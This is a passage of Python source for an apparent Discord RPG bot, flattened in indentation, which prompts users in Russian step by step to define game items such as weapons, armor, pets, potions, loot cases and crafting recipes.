race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'point':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Мощность предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите мощность `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`heal` - при использовании зелья, восстановит здоровье пользователя.\n`mana` - при использовании зелья, восстановит ману пользователя."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['mana', 'heal']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (heal, mana) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, emoji_v))
elif type == 'case':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act != 'Не указано' and act != f"Укажите id предметов выпадаемые из `{name}`\nПример: 16 52 13" and act != None:
emb.add_field(name = "Выпадаемые предметы", value = f"{','.join(str(x) for x in act)}")
else:
emb.add_field(name = "Выпадаемые предметы", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
await message.edit(embed = embed(type, name, f"Укажите id предметов выпадаемые из `{name}`\nПример: 16 52 13"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
act = []
try:
try:
act1 = msg.content.split()
for i in act1:
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
item.update({ 'act': act })
await message.edit(embed = embed(type, name, act, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, image, quality, description, action_m, race_u, emoji_v))
elif type == 'armor':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Защита предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите защиту `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`add` - при использовании добавляет броню.\n`set` - при использовании устанавливает броню."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['add', 'set']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (add, set) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'weapon':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Урон предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите урон `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`sword` - меч\n`staff` - посох (условно, может быть чем угодно), тратит ману при использовании\n`bow` - лук (условно, может быть автоматом или чем угодно) тратит указанный предмет из инвентаря при использовании."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['sword', 'staff', 'bow']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (sword, staff, bow) и повторите создание снова!")
return
style = msg.content
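# Weapon styles prompt for one extra parameter: `bow` asks for the id of the
# ammo item (item['bow_item']), `staff` for the mana cost per use
# (item['mana_use']), and `sword` for durability, 0 meaning unlimited (item['stabl']).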
if style == 'bow':
try:
mmsg = await ctx.send("Укажите используемый для стрельбы предмет (id):")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
iddd = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
try:
server['items'][str(iddd)]
except:
await ctx.send("Требовалось id существующего предмета!!")
return
item['bow_item'] = iddd
try:
await mmsg.edit(content = f'Укажите используемый для стрельбы предмет (id): {iddd}')
except:
pass
if style == 'staff':
try:
mmsg = await ctx.send("Укажите количество используемой маны:")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
ni = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if ni < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item['mana_use'] = ni
try:
await mmsg.edit(content = f'Укажите количество используемой маны: {ni}')
except:
pass
if style == 'sword':
try:
mmsg = await ctx.send("Укажите прочность (0 - бесконечная прочность):")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
ni = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if ni < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item['stabl'] = ni
try:
await mmsg.edit(content = f'Укажите прочность (0 - бесконечная прочность): {ni}')
except:
pass
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'pet':
def embed(type = 'Не указано', name = 'Не указано', style = 'Не указано', act = 'Не указано', image = 'Не указано', chance = 'Не указано', damage = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип", value = f"{type}")
emb.add_field(name = "Имя питомца", value = f"{name}")
emb.add_field(name = "Стиль питомца", value = f"{style}")
emb.add_field(name = "Процент улучшения", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение питомца:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Шанс атаки", value = f"{chance}")
emb.add_field(name = "Урон", value = f"{damage}")
emb.add_field(name = "Редкость питомца", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
text = "`hp+` - бонус к здоровью.\n`mana+` - бонус к мане.\n`damage+` - бонус к урону.\n`armor+` - бонус к защите.\n`mana-` - уменьшение использования маны"
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ["hp+", "mana+", "damage+", "armor+", "mana-"]:
item.update({ 'style': msg.content})
else:
await ctx.send(f'Вы указали не действительный стиль предмета, выберите 1 из ({", ".join(["hp+", "mana+", "damage+", "armor+", "mana-"])}) и повторите создание снова!')
return
style = msg.content
try:
await message.edit(embed = embed(type, name, style, f"Укажите процент увелечения `{style}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
act = float(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
item.update({ 'act': act})
await message.edit(embed = embed(type, name, style, act, "Укажите изображение питомца:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, style, act, image, f"Укажите процент атаки `{name}`"))
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
chance = int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
if chance < 1 or chance > 100:
await ctx.send(f"Требовалось указать число от 1 до 100!")
return
else:
item.update({ 'chance': chance})
await message.edit(embed = embed(type, name, style, act, image, chance, f"Укажите урон `{name}`"))
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
damage = int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
item.update({ 'damage': damage})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, f"Укажите качество питомца: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed( type, name, style, act, image, chance, damage, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, style, act, image, chance, damage, quality, description, action_m, race_u, element, emoji_v))
elif type == 'material':
def embed(type = 'Не указано', name = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, image, quality, description, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, image, quality, description, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, image, quality, description, race_u, emoji_v))
elif type == 'recipe':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', ndi = 'Не указано', create = 'Не указано', uses = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act != 'Не указано' and act != 'Укажите id предметов для крафта: (максимум 500 предметов)':
emb.add_field(name = "Используемые предметы", value = f"{', '.join(str(x) for x in act)}")
else:
emb.add_field(name = "Используемые предметы", value = f"{act}")
if ndi != 'Не указано' and ndi != 'Укажите не удаляемые предметы' and ndi != None:
emb.add_field(name = "Не удаляемые предметы", value = f"{', '.join(str(x) for x in ndi)}")
else:
emb.add_field(name = "Не удаляемые предметы", value = f"{ndi}")
if create != 'Не указано' and create != 'Укажите id предметов которые будут созданы: (максимум 500 предметов)':
emb.add_field(name = "Создаваемые предметы", value = f"{', '.join(str(x) for x in create)}")
else:
emb.add_field(name = "Создаваемые предметы", value = f"{create}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Использований", value = f"{uses}")
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{', '.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
b = 500
act = []
emb = discord.Embed(title = "",
description = "Укажите id предметов для крафта, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет удалено 2 предмета с id 11)", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, f"Укажите id предметов для крафта: (максимум 500 предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
try:
try:
act1 = msg.content.split()
a = 0
for i in act1:
if a > b:
await ctx.send(f"Вы указали количество предметов для крафта больше допустимого ({b})")
return
a += 1
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
item.update({'act': act})
try:
emb = discord.Embed(title = "Укажите предметы (id) которые не будут удаляться: (Пример: 1 2 8)",
description = "`none` - при крафте все предметы удаляться из инвенторя\n", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите не удаляемые предметы"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content == 'none':
item.update({ 'ndi': None})
ndi = None
else:
ms_c_i = list(int(x) for x in msg.content.split())
# the non-deletable items must all be part of the craft ingredients listed in act
if set(ms_c_i) <= set(act):
ndi = ms_c_i
else:
await ctx.send("Требовалось указать предметы (число) из крафта которые не будут удаляться!")
return
item.update({ 'ndi': ndi})
try:
b = 500
emb = discord.Embed(title = "",
description = "Укажите id создаваемых предметов, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет создано 2 предмета с id 11)", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, ndi, f"Укажите id предметов которые будут созданы: (максимум 500 предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
try:
try:
cr = []
cr1 = msg.content.split()
a = 0
for i in cr1:
if a > b:
await ctx.send(f"Вы указали количество предметов для крафта больше допустимого ({b})")
return
a += 1
cr.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in cr:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
create = cr
item.update({'create': cr})
try:
await message.edit(embed = embed(type, name, act, ndi, create, "Укажите сколько раз можно использовать предмет (0 - бесконечность):"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
uses = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if uses < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item.update({'uses': uses})
await message.edit(embed = embed(type, name, act, ndi, create, uses, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
